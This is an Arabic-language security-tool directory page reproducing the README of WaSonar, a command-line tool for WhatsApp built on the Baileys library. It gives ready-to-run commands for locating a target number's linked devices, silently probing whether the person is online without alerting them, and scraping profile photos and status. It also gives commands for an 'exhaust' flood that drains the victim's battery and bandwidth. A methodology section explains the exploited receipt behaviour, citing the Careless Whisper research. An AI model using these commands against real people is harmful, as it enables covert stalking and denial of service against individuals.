Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
WaSonar — أداة استخبارات واستنزاف الموارد لتطبيق واتساب. تشمل ميزاتها تتبع الأجهزة في الوقت الفعلي، واستقصاء RTT الصامت، واختبار إجهاد البروتوكول لأغراض البحث الأمني. | Kitploit
أدوات/GitHubGitHub/ajayantoisdev/wasonar
الاستخبارات مفتوحة المصدر (OSINT)الاستطلاعتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتاختبار الاختراقأمن الجوالالخصوصية
GitHubajayantoisdev/wasonar

WaSonar

أداة استخبارات واستنزاف الموارد لتطبيق واتساب. تشمل ميزاتها تتبع الأجهزة في الوقت الفعلي، واستقصاء RTT الصامت، واختبار إجهاد البروتوكول لأغراض البحث الأمني.

عرض المستودع
51524منذ 9 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
شعار WaSonar لقطة شاشة

License Version Node.js

إخلاء مسؤولية: هذه الأداة مخصصة للأغراض التعليمية والبحث الأمني فقط. المطوّرون غير مسؤولين عن أي إساءة استخدام. يرجى الاستخدام بمسؤولية وأخلاقية.

WaSonar هي أداة سطر أوامر قوية مصممة للبحث التعليمي وتتبع الأجهزة واختبار الإجهاد على بروتوكول واتساب. مبنية فوق Baileys.

الميزات • التثبيت • الاستخدام


الميزات

  • تتبع الأجهزة في الوقت الفعلي: كشف حالة الاتصال/عدم الاتصال بدقة لجميع الأجهزة المرتبطة (الهاتف، الويب، سطح المكتب).
  • اكتشاف الأجهزة: سرد جميع الأجهزة المرتبطة برقم هدف (الهاتف الرئيسي + الأجهزة المصاحبة).
  • استخراج الملف الشخصي: جلب صور الملف الشخصي ومعلومات الحالة/السيرة ومعرّفات JID.
  • استنزاف الموارد: إغراق الأجهزة بحمولات تفاعل ضخمة (وضعان عدواني/بطيء).

التثبيت

عبر NPM (موصى به)

npm install -g wasonar-cli

عبر NPX (بدون الحاجة إلى تثبيت)

npx wasonar-cli <command>

من المصدر

git clone https://github.com/AjayAntoIsDev/wasonar.git
cd wasonar
npm install

الاستخدام

1. تسجيل الدخول

أولاً، تحتاج إلى المصادقة باستخدام حساب واتساب.

wasonar-cli login

امسح رمز الاستجابة السريعة (QR) الذي يظهر في الطرفية.

2. اكتشاف الأجهزة

سرد جميع الأجهزة المتصلة برقم هدف.

wasonar-cli devices <target-number>

# Example:
wasonar-cli devices 919876543210

3. حالة الاتصال ووقت الرحلة (RTT)

الميزة الأساسية. أرسل استطلاعات صامتة للكشف عما إذا كانت الأجهزة متصلة وقياس زمن الاستجابة.

# Probe infinite times (default)
wasonar-cli online 919876543210

# Send specific number of probes
wasonar-cli online 919876543210 --probes 5

# Save results to file
wasonar-cli online 919876543210 --output ./logs

ملاحظة: تعني حالة PENDING/OFFLINE أن الخادم استلم الرسالة، لكن الجهاز الهدف لم يؤكد الاستلام.

4. استخراج الملف الشخصي

احصل على صورة ملف المستخدم وحالته.

# Display info and download profile picture
wasonar-cli profile 919876543210 --output ./profiles

5. استنزاف الموارد

⚠️ للاستخدام التعليمي فقط. إرسال حمولات ضخمة عالية التردد.

# Aggressive mode (Default: 250 req/s, 1KB payload)
wasonar-cli exhaust 919876543210

# Slow mode (10 req/s, 500B payload)
wasonar-cli exhaust 919876543210 --aggression slow

# Set duration
wasonar-cli exhaust 919876543210 --duration 30

المنهجية

الاستطلاعات الصامتة

يستخدم WaSonar "استطلاعات الحذف الصامت" لكشف حالة الاتصال دون تنبيه الهدف.

  1. يرسل رسالة "ملغاة" (حذف) لمعرّف رسالة غير موجود.
  2. يتلقى الجهاز الهدف طلب "الحذف" هذا.
  3. إذا كان متصلاً، يرسل الجهاز إشعار استلام delivery_receipt (الحالة 3) لرسالة البروتوكول.
  4. يلتقط WaSonar هذا الإشعار لتأكيد حالة الاتصال وحساب زمن الرحلة ذهابًا وإيابًا (RTT).

هجوم الاستنزاف

استنادًا إلى بحث "Careless Whisper"، يستغل هذا الهجوم الفجوة في التحقق من معالجة التفاعلات في واتساب.

التفاصيل التقنية

على الرغم من أن التفاعلات غير الصالحة لا تظهر على هاتف الهدف، إلا أنها ما تزال تُستقبل وتُعالَج.

  • حدود الحمولة: تسمح خوادم واتساب بحمولات تفاعل تصل إلى 1 ميغابايت.
  • المعالجة: يحاول العميل معالجة هذه الرسائل قبل تجاهلها (الحد ~30 بايت للعرض الصالح)، مما يستهلك الموارد.

تحليل الأثر

تشير بيانات الأبحاث إلى إمكانية كبيرة لاستنزاف الموارد:

  • تضخم الحركة المرورية: يمكن لجلسة واحدة توليد حركة مرور خفية تبلغ ~3.7 ميغابايت/ثانية (13.3 غيغابايت/ساعة).
  • استنزاف البطارية: يمكن أن تؤدي المعالجة السريعة لهذه الرسائل إلى استنزاف 14-18% من البطارية في الساعة على الهواتف الذكية الحديثة (تم اختباره على iPhone 13 Pro وS23) أثناء وجود الجهاز في وضع الاستعداد.
  • حجب الخدمة: يمكن أن يؤدي استهلاك النطاق الترددي إلى حجب الخدمة عن التطبيقات الأخرى على جهاز الضحية.

الاقتباس

استنادًا إلى بحث لكل من Gegenhuber وآخرين، جامعة فيينا وSBA Research:

@inproceedings{gegenhuber2024careless,
  title={Careless Whisper: Exploiting Silent Delivery Receipts to Monitor Users on Mobile Instant Messengers},
  author={Gegenhuber, Gabriel K. and G{\"u}nther, Maximilian and Maier, Markus and Judmayer, Aljosha and Holzbauer, Florian and Frenzel, Philipp {\'E}. and Ullrich, Johanna},
  year={2024},
  organization={University of Vienna, SBA Research}
}

أُنشئ بواسطة AjayAnto

تنزيل الأداة